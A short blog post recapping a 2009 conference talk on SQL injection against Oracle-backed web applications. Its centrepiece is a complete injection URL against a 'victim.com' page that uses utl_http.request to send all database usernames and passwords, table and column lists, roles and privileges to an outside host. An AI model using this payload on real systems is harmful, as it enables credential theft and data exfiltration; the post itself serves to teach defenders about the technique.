Just back from the [1] IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning [2] SQL Injection in web applications with Oracle backend databases.

Here a short example from the presentation:

The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).

http://victim.com/order.jsp?id=17‘ or 1=((select sum(length(utl_http.request(’http://www.orasploit.com/’username||’='||password) from dba_users)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’owner||’='||table_name) from dba_tables)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’owner||’='||table_name||’='||column_name)) from dba_users))+((select sum(length(utl_http.request(’http://www.orasploit.com/’grantee||’='||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’grantee||’='||owner||’='||table_name||’='||privilege||’='||grantable) from dba_tab_privs)))–

More details in the [3] presentation.